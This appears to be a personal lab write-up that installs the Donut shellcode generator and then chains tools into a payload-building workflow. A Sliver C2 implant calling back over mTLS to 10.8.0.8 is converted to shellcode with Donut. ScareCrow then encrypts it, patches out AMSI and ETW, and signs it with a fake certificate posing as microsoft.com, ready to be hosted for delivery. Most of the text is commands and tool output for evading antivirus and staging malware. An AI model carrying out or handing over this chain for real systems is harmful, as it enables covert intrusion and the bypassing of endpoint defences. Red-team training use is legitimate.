Donut
1st : sudo apt install g++-mingw-w64-x86-64 gcc-mingw-w64-x86-64
2nd : wget https://github.com/TheWover/donut/releases/download/v0.9.3/donut_v0.9.3.tar.gz
3th : tar -xvzf donut_v0.9.3.tar.gz
result :
bolke@js-donut:~/donut2/donut_v0.9.3$ ls -la
total 108
drwxr-xr-x 4 bolke bolke 4096 Dec 21 2019 .
drwxrwxr-x 3 bolke bolke 4096 May 13 11:28 ..
-rwxr-xr-x 1 bolke bolke 64912 Dec 21 2019 donut
-rw-r--r-- 1 bolke bolke 5309 Dec 21 2019 donut.1
drwxr-xr-x 2 bolke bolke 4096 Dec 21 2019 examples
drwxr-xr-x 2 bolke bolke 4096 Dec 21 2019 lib
-rw-r--r-- 1 bolke bolke 1517 Dec 21 2019 LICENSE
-rw-r--r-- 1 bolke bolke 12874 Dec 21 2019 README.html
bolke@js-donut:~/donut2/donut_v0.9.3$ ./donut
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
usage: donut [options] <EXE/DLL/VBS/JS>
Only the finest artisanal donuts are made of shells.
-MODULE OPTIONS-
-n <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.
-s <server> HTTP server that will host the donut module.
-e <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
-PIC/SHELLCODE OPTIONS-
-a <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
-b <level> Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
-o <path> Output file to save loader. Default is "loader.bin"
-f <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y <addr> Create thread for loader and continue execution at <addr> supplied.
-x <action> Exiting. 1=Exit thread (default), 2=Exit process
-FILE OPTIONS-
-c <namespace.class> Optional class name. (required for .NET DLL)
-d <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
-m <method | api> Optional method or function for DLL. (a method is required for .NET DLL)
-p <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.
-w Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
-r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
-t Execute the entrypoint of an unmanaged EXE as a thread.
-z <engine> Pack/Compress file. 1=None, 2=aPLib
examples:
donut c2.dll
donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll
donut loader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
bolke@js-donut:~/donut2/donut_v0.9.3$
…
or with docker
install on Ubuntu 24.04.02 LTS : sudo docker build -t donut .
bolke@js-srv01:~/donut$ sudo docker build -t donut .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 14.69MB
Step 1/11 : FROM ubuntu:22.04
22.04: Pulling from library/ubuntu
215ed5a63843: Pull complete
Digest: sha256:67cadaff1dca187079fce41360d5a7eb6f7dcd3745e53c79ad5efd8563118240
Status: Downloaded newer image for ubuntu:22.04
---> c42dedf797ba
Step 2/11 : RUN apt-get update
---> Running in 2f62edb78629
Get:1 http://archive.ubuntu.com/ubuntu jammy InRelease [270 kB]
Get:2 http://security.ubuntu.com/ubuntu jammy-security InRelease [129 kB]
Get:3 http://archive.ubuntu.com/ubuntu jammy-updates InRelease [128 kB]
--snip--
loader_exe_x86.go
loader_exe_x86.h
pyproject.toml
setup.py
version-release-notes.txt
---> Removed intermediate container 4cad547e0fa4
---> fff5ee8ca773
Step 11/11 : ENTRYPOINT ["/opt/donut/donut"]
---> Running in 354facff12fe
---> Removed intermediate container 354facff12fe
---> 124c8ac52483
Successfully built 124c8ac52483
Successfully tagged donut:latest
bolke@js-srv01:~/donut$
.
then : sudo docker run -it –rm -v “${PWD}:/workdir” donut -h
bolke@js-srv01:~$ sudo docker run -it --rm -v "${PWD}:/workdir" donut -h
[ Donut shellcode generator v1 (built May 12 2025 13:50:10)
[ Copyright (c) 2019-2021 TheWover, Odzhan
usage: donut [options] <EXE/DLL/VBS/JS>
Only the finest artisanal donuts are made of shells.
-MODULE OPTIONS-
-n,--modname: <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.
-s,--server: <server> Server that will host the Donut module. Credentials may be provided in the following format: https://username:password@192.168.0.1/
-e,--entropy: <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
-PIC/SHELLCODE OPTIONS-
-a,--arch: <arch>,--cpu: <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
-o,--output: <path> Output file to save loader. Default is "loader.bin"
-f,--format: <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y,--fork: <offset> Create a new thread for the loader and continue execution at <offset> relative to the host process's executable.
-x,--exit: <action> Exit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely
-FILE OPTIONS-
-c,--class: <namespace.class> Optional class name. (required for .NET DLL)
-d,--domain: <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
-i,--input: <path>,--file: <path> Input file to execute in-memory.
-m,--method: <method>,--function: <api> Optional method or function for DLL. (a method is required for .NET DLL)
-p,--args: <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.
-w,--unicode Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
-r,--runtime: <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
-t,--thread Execute the entrypoint of an unmanaged EXE as a thread.
-EXTRA-
-z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib
-b,--bypass: <level> Bypass AMSI/WLDP/ETW : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
-k,--headers: <level> Preserve PE headers. 1=Overwrite (default), 2=Keep all
-j,--decoy: <level> Optional path of decoy module for Module Overloading.
examples:
donut -ic2.dll
donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
donut -iloader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
bolke@js-srv01:~$ pwd
/home/bolke
bolke@js-srv01:~$
.
See it in action
1 – Generate the payload from SliverC2
sliver > generate --mtls 10.8.0.8 --os windows --arch amd64 --format exe -G --skip-symbols [*] Generating new windows/amd64 implant binary [!] Symbol obfuscation is disabled [*] Build completed in 2s [*] Implant saved to /home/bolke/STABLE_YAK.exe sliver >
2 – Donut the file
┌──(bolke㉿bolke)-[~/donut_v0.9.3]
└─$ ./donut STABLE_YAK.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "STABLE_YAK.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(bolke㉿bolke)-[~/donut_v0.9.3]
3. Install Scarecrow requirements
┌──(bolke㉿bolke)-[~] └─$ osslsigncode Command 'osslsigncode' not found, but can be installed with: sudo apt install osslsigncode Do you want to install it? (N/y)y sudo apt install osslsigncode Installing: osslsigncode Summary: Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 210 Download size: 79.6 kB Space needed: 236 kB / 77.4 GB available Get:1 http://kali.download/kali kali-rolling/main amd64 osslsigncode amd64 2.9-2 [79.6 kB] Fetched 79.6 kB in 0s (231 kB/s) Selecting previously unselected package osslsigncode. (Reading database ... 459883 files and directories currently installed.) Preparing to unpack .../osslsigncode_2.9-2_amd64.deb ... Unpacking osslsigncode (2.9-2) ... Setting up osslsigncode (2.9-2) ... Processing triggers for kali-menu (2025.2.7) ...
verify
┌──(bolke㉿bolke)-[~]
└─$ osslsigncode -v
osslsigncode 2.9, using:
OpenSSL 3.3.2 3 Sep 2024 (Library: OpenSSL 3.5.0 8 Apr 2025)
Default -CAfile location: /etc/ssl/certs/ca-certificates.crt
Please send bug-reports to Michal.Trojnara@stunnel.org
4 run Scarecrow
┌──(bolke㉿bolke)-[~]
└─$ ./ScareCrow_5.1_linux_amd64 -I /home/bolke/STABLE_YAK.exe --domain microsoft.com
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2385 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of cmd.exe: 1d099be96c341bc9b0c4bb2120fc74c95effbc1ad840c0b34813988fa9314ee8
┌──(bolke㉿bolke)-[~]
5. copy the signed executable here cmd.exe to your python webserver or similar.
not sure if needed ( but i did install both )
┌──(bolke㉿bolke)-[~/vulnlab/wutai] └─$ go Command 'go' not found, but can be installed with: sudo apt install gccgo-go sudo apt install golang-go
Regards
references: